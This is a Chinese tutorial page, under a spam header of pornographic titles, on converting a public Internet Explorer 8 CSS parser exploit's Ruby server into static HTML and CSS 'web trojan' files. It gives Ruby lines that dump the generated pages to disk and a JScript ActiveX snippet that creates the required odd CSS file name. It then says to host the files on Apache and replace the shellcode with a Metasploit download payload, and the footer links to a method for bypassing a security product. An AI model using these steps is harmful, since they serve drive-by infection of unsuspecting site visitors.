亚洲日本免费-啊轻点灬太粗太长了三男一女-麻豆av电影在线观看-日韩一级片毛片|www.grbbt.com

Internet Explorer 8 CSS Parser Exploit網(wǎng)馬轉(zhuǎn)成html的方法

  這個(gè)exp用的是http發(fā)包的方法,是一個(gè)ruby小腳本,萬一同時(shí)多人訪問就掛了。所以還要轉(zhuǎn)成 htm。

  原作者為什么要用http發(fā)包,估計(jì)是沒有解決 css文件名的問題。

  漏洞的原理、分析我也不會(huì),我只是改造了這個(gè)ruby

  一、第一步

  在原來的腳本(http://www.exploit-db.com/exploits/15746/),down save下來為15746.rb,editplus打開

  break unless http_send(cli, @html, :type=>"text/html")

  下邊加上

  aFile = File.new("C:\lcx.htm","wb")

  aFile.puts @html

  aFile.close

  運(yùn)行15746.rb,然后用ie訪問127.0.0.1:55555/test.html就會(huì)自動(dòng)生成lcx.htm

  二、第二步

  在原來的腳本(http://www.exploit-db.com/exploits/15746/)

  break unless http_send(cli, @css, :type=>"text/css")(有兩行,最后一行吧)

  下邊加上

  aFile = File.new("C:\lcx.css","wb")

  aFile.puts @css

  aFile.close

  當(dāng)你訪問127.0.0.1:55555,會(huì)自動(dòng)生成lcx.css

  三、第三步

  我的ruby水平有限,不知如何用ruby生成哪個(gè)奇怪的css文件名,我用的js

  var fso, f1;

  fso = new ActiveXObject("Scripting.FileSystemObject");

  f1 = fso.CreateTextFile(decodeURI("s%CD%B3s%CD%B3s%CD%B3s%CD%B3"), true);

  運(yùn)行這個(gè)js,會(huì)生成一個(gè)"奇怪"的文件名。然后用這個(gè)文件名改掉原來的lcx.css文件名。

  四、第四步

  構(gòu)架環(huán)境測(cè)試。因?yàn)閕is不認(rèn)這個(gè)s%CD%B3s%CD%B3s%CD%B3s%CD%B3東東,所以你把生成的lcx.htm和改名的lcx.css傳到apache空間上。測(cè)試之前,你可以用editplus打開lcx.htm,換掉里邊的shellcode。我是直接用msfpayload生成一個(gè)下載的shellcode的。

 

上一篇:安卓防火墻 PS DroidWall

下一篇:過安全狗的一種方法